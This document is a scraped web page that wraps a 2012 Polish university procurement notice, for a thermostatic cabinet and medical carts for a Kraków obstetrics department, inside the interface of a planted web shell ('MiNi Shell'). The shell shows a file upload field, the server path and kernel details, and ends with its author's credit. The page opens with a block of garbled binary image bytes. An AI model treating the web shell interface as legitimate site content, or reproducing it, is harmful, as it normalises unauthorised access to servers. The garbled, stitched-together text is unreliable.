JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/87062-N-2012.html

<p class="kh_header"><b>Kraków: Dostawa szafy termostatycznej oraz wózków aparaturowych w ramach realizacji projektu nr WND-POIS.12.00-00-013/08 p.n. Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie - przebudowa istniejących bloków porodowych wraz z wyposażeniem, finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, DZP/CM/242/3-27/ZP/12</b><br>
<b>Numer ogłoszenia: 87062 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Jagielloński Collegium Medicum , ul. Św. Anny 12, 31-008 Kraków, woj. małopolskie, tel. 12 433 27 29, faks 12 433 27 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cm-uj.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa szafy termostatycznej oraz wózków aparaturowych w ramach realizacji projektu nr WND-POIS.12.00-00-013/08 p.n. Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie - przebudowa istniejących bloków porodowych wraz z wyposażeniem, finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, DZP/CM/242/3-27/ZP/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa szafy termostatycznej oraz wózków aparaturowych w ramach realizacji projektu nr WND-POIS.12.00-00-013/08 p.n. Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie - przebudowa istniejących bloków porodowych wraz z wyposażeniem, finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (Umowa nr UDA-POIS.12.02.00-00-013/08-00 z dnia 19.05.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-01 z dnia 3.12.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-02 z 16.12.2011r.)




Przedmiot zamówienia obejmuje 2 części: cześć I zamówienia obejmuje dostawę szafy termostatycznej (1 sztuka), cześć II zamówienia obejmuje dostawę wózków aparaturowych (6 sztuk). Oferowany sprzęt musi być fabrycznie nowy i pochodzić z bieżącej produkcji (2012 rok). Cześć I przedmiotu zamówienia - szafa termostatyczna musi podsiadać dokumenty wymagane obowiązującymi przepisami tj. ustawą z dnia 30.08.2002 o systemie oceny zgodności (t.j. Dz. U. z 2010 nr 138, poz 935 z późn. zm.). Część II przedmiotu zamówienia - wózki aparaturowe  muszą  podsiadać dokumenty wymagane obowiązującymi przepisami tj. ustawą z dnia 20 maja 2010 r. 
o wyrobach medycznych -  (Dz. U. nr 107, poz. 679 z późn. zm.) potwierdzające oznakowanie CE (deklaracja zgodności lub certyfikat CE). Zakres przedmiotu zamówienia obejmuje:
1.	Dostawę wraz z transportem do siedziby użytkownika.
2.	Uruchomienie szafy termostatycznej.
3.	Dostarczenie kart gwarancyjnych oraz instrukcji obsługi w języku polskim. 
4.	Udzielenie minimum 12 miesięcznej gwarancji jakości na przedmiot zamówienia, licząc od daty protokołu przekazania do eksploatacji (część I i II). 
5.	Świadczenie serwisu gwarancyjnego w okresie gwarancji:
5.1 czas reakcji serwisu do 24 godzin od momentu, wysłania faksu lub e-maila z informacją o wadzie (część I ) i czas reakcji serwisu do 48 godzin od momentu, wysłania faksu lub e-maila z informacją o wadzie (część II).
5.2 wymagany termin naprawy: 14 dni od chwili zgłoszenia wady. W przypadku braku możliwości dokonania naprawy w tym terminie, Wykonawca zobowiązany jest do dostarczenia na własny koszt zastępczej szafy termostatycznej lub zastępczego wózka aparaturowego o parametrach nie gorszych niż naprawiany (na czas naprawy) (część I i II)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 33.19.23.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Karty katalogowe, foldery, prospekty</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga aby cześć I przedmiotu zamówienia - szafa termostatyczna musi podsiadać dokumenty wymagane obowiązującymi przepisami i tj. ustawą z dnia 30.08.2002 o systemie oceny zgodności (t.j. Dz. U. z 2010 nr 138, poz 935 z późn. zm.) potwierdzające oznakowanie CE (deklaracja zgodności lub certyfikat CE). Część II przedmiotu zamówienia - wózki aparaturowe  muszą  podsiadać dokumenty wymagane obowiązującymi przepisami tj. ustawą z dnia 20 maja 2010 r. o wyrobach medycznych -  (Dz. U. nr 107, poz. 679 z późn. zm.) potwierdzające oznakowanie CE (deklaracja zgodności lub certyfikat CE). Dokumenty potwierdzające w/w wymogi należy załączyć do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.dzp.cm-uj.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych UJ CM, ul. Grzegórzecka 20,31-351 Kraków, pok. nr 245.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 10:00, miejsce: Dział Zamówień Publicznych UJ CM, ul. Grzegórzecka 20,31-351 Kraków, pok. nr 245.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu nr WND-POIS.12.00-00-013/08 p.n. Modernizacja Katedry Ginekologii i Położnictwa UJ CM w Krakowie - przebudowa istniejących bloków porodowych wraz z wyposażeniem, finansowanego w ramach działania 12.2 Inwestycje w infrastrukturę ochrony zdrowia o znaczeniu ponadregionalnym, priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 (Umowa nr UDA-POIS.12.02.00-00-013/08-00 z dnia 19.05.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-01 z dnia 3.12.2010r., aneks nr UDA-POIS.12.02.00-00-013/08-02 z 16.12.2011r.).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cześć I zamówienia obejmuje dostawę szafy termostatycznej (1 sztuka)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć I zamówienia obejmuje dostawę szafy termostatycznej (1 sztuka) dla Katedry Ginekologii i Położnictwa Uniwersytetu Jagiellońskiego - Collegium Medicum. Szafa termostatyczna - urządzenie fabrycznie nowe, nieużywane, pochodzące z bieżącej produkcji 2012 r. Parametry:
Wymuszony obieg powietrza.	
Pojemność komory:	min. 493 l
Podwójne drzwi	
Zakres temperatury pracy:	min. -10°C - +10°C
Mikroprocesorowy z zewnętrznym wyświetlaczem sterownik.	
Materiał komory - aluminium.	
Materiał obudowy - blacha malowana proszkowo.	
Wymiary zewnętrzne [mm]:	
A. Szerokość: 	min. 635 mm
B. Wysokość:	min. 2025 mm
C. Głębokość:	min. 810 mm
Wymiary komory  [mm]:	
A. Szerokość: 	min. 510 mm
B. Wysokość:	min. 1510 mm
C. Głębokość:	min. 640 mm
Regulacja temperatury:	co 0,1 °C
Funkcja odszraniania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 33.19.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Cześć II zamówienia obejmuje dostawę wózków aparaturowych (6 sztuk)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć II zamówienia obejmuje dostawę wózków aparaturowych (6 sztuk) dla Katedry Ginekologii i Położnictwa Uniwersytetu Jagiellońskiego - Collegium Oferowane urządzenia muszą być fabrycznie nowe i pochodzić z bieżącej produkcji (2012r.). Medicum.   Parametry:
Wózek aparaturowy  typ A - sztuk 3
1.	Wózek aparaturowy - urządzenie fabrycznie nowe, nieużywane, pochodzące z bieżącej produkcji z 2012 r.*	
2.	Wózek 4- szufladowy z pulpitem wysuwanym z przodu w całości metalowy malowany proszkowo (lub innej).	
3.	Kontener szufladowy metalowy dwuwarstwowy, szczelny z wewnętrznymi elementami usztywniającymi i wygłuszającymi, posadowiony między 2-ma kolumnami nośnymi z profilowanej blachy stalowej ocynkowanej galwanicznie (lub innej). 	
4.	Szuflady skrzynkowe poruszające się na prowadnicach rolkowych, które się same domykają.	
5.	Pod blatem trzy czoła szuflad o wysokości 100 mm +/- 10 mm	
6.	Czwarte czoło szuflad o wysokości 300 mm +/- 10 mm 	
7.	Szuflady wyposażone w system przestawnego podziału wewnętrznego.	
8.	W standardzie zamontowana uszczelka szufladowa i zamek patentowy, centralnie blokujący otwieranie szuflad. 	
9.	Wszystkie elementy metalowe pokryte wysokiej jakości lakierem proszkowym odpornym na uszkodzenia mechaniczne, środki dezynfekcyjne i promieniowanie UV. 	
10.	Blat roboczy o wymiarach 630 x 570 mm +/- 30 mm zagłębiony z burtami o wysokości min. 60 mm z trzech stron. 	
11.	Zespół jezdny składający się z 4- kółek pojedynczych o średnicy min. 100 mm, dwa koła wyposażone w hamulec i blokadę obrotu, z 4-stron odboje zabezpieczające wózek przed uszkodzeniem. 	
12.	Wymiary wózka 820 x 630 x 890 mm +/-100 mm         	
13.	Wyposażenie wózka 
- Dwie szyny sprzętowe do montażu akcesoriów
- Zestaw dozowników 4/5 skrzynkowych z tworzywa 
- Uchwyt z pojemnikiem na zużyte igły z tworzywa 
- Uchwyt z miską nerkową 
- uchwyt z koszem ze stali kwasoodpornej wymiarach 580x285x260 mm +/-30 mm
- Uchwyt na kartonik z rękawiczkami
- stelaż z pokrywą do worka na odpady medyczne 	
                                                                             Wózek aparaturowy typ B - sztuk 2
1.	Wózek aparaturowy - urządzenie fabrycznie nowe, nieużywane, pochodzące z bieżącej produkcji z 2012 r.*	
2.	Wózek 4- szufladowy z pulpitem wysuwanym z przodu w całości metalowy malowany proszkowo (lub innej).Wózek 4- szufladowy z pulpitem wysuwanym z przodu w całości 	
3.	Kontener szufladowy metalowy dwuwarstwowy, szczelny z wewnętrznymi elementami usztywniającymi i wygłuszającymi, posadowiony między 2-ma kolumnami nośnymi z profilowanej blachy stalowej ocynkowanej galwanicznie (lub innej). 	
4.	Szuflady skrzynkowe poruszające się na prowadnicach rolkowych, które się same domykają.	
5.	Pod blatem trzy czoła szuflad o wysokości 100 mm +/- 10 mm	
6.	Czwarte czoło szuflad o wysokości 300 mm +/- 10 mm 	
7.	Szuflady wyposażone w system przestawnego podziału wewnętrznego.	
8.	W standardzie zamontowana uszczelka szufladowa i zamek patentowy, centralnie blokujący otwieranie szuflad. 	
9.	Wszystkie elementy metalowe pokryte wysokiej jakości lakierem proszkowym odpornym na uszkodzenia mechaniczne, środki dezynfekcyjne i promieniowanie UV. 	
10.	Blat roboczy o wymiarach 630 x 570 mm +/- 30 mm zagłębiony z burtami o wysokości min. 60 mm z trzech stron. 	
11.	Zespół jezdny składający się z 4- kółek pojedynczych o średnicy min. 100 mm, dwa koła wyposażone w hamulec i blokadę obrotu, z 4-stron odboje zabezpieczające wózek przed uszkodzeniem. 	
12.	Wymiary wózka 820 x 630 x 890 mm +/-100 mm         	
13.	Wyposażenie wózka:
- Dwie szyny sprzętowe do montażu akcesoriów
- Zestaw dozowników 4/5 skrzynkowych z tworzywa 
	
Wózek aparaturowy typ C - sztuk 1
1.	Wózek aparaturowy - urządzenie fabrycznie nowe, nieużywane, pochodzące z bieżącej produkcji z 2012 r.*	
2.	Wózek 4- szufladowy z pulpitem wysuwanym z przodu w całości metalowy malowany proszkowo (lub innej).	
 3.	Kontener szufladowy metalowy dwuwarstwowy, szczelny z wewnętrznymi elementami usztywniającymi i wygłuszającymi, posadowiony między 2-ma kolumnami nośnymi z profilowanej blachy stalowej ocynkowanej galwanicznie (lub innej). 	
4.	Szuflady skrzynkowe poruszające się na prowadnicach rolkowych, które się same domykają.	
5.	Pod blatem dwa czoła szufladowe o wysokości  100 mm 
+/-10 mm	
6.	Trzecie czoło szuflad o wysokości 210 mm +/- 10 mm	
7.	Czwarte czoło szuflad o wysokości 300 mm +/- 10 mm	
8.	Szuflady wyposażone w system przestawnego podziału wewnętrznego.	
9.	W standardzie zamontowana uszczelka szufladowa i zamek patentowy, centralnie blokujący otwieranie szuflad. 	
10.	Wszystkie elementy metalowe pokryte wysokiej jakości lakierem proszkowym odpornym na uszkodzenia mechaniczne, środki dezynfekcyjne i promieniowanie UV. 	
11.	Blat roboczy o wymiarach 630 x 570 mm +/- 30 mm zagłębiony z burtami o wysokości min. 60 mm z trzech stron. 	
12.	Zespół jezdny składający się z 4- kółek pojedynczych o średnicy min. 100 mm, dwa koła wyposażone w hamulec i blokadę obrotu, z 4-stron odboje zabezpieczające wózek przed uszkodzeniem. 	
13.	Wymiary wózka 820 x 630 x 890 mm +/-100 mm         	
14.	Wyposażenie wózka 
- Dwie szyny sprzętowe do montażu akcesoriów
- Uchwyt do pojemnika na rękawiczki jednorazowe 
- Uchwyt z pojemnikiem na zużyte igły z tworzywa 
- Uchwyt z miską na odpady ze stali nierdzewnej  średnica miski min. 200 mm 
- Pojemnik na cewniki zawieszany na szynie sprzętowej  o wymiarach 180 x 60 x 500 mm +/-30 mm wewnątrz ruchoma przegroda pionowa dzieląca wnętrze na trzy komory 
- uchwyt z koszem ze stali kwasoodpornej wymiarach  580x285x260 mm +/-30 mm 
- stelaż z pokrywą do worka na odpady medyczne 
- Uchwyt na kartonik z rękawiczkami
- Nadstawka na nici chirurgiczne wykonana ze stali kwasoodpornej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 33.19.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com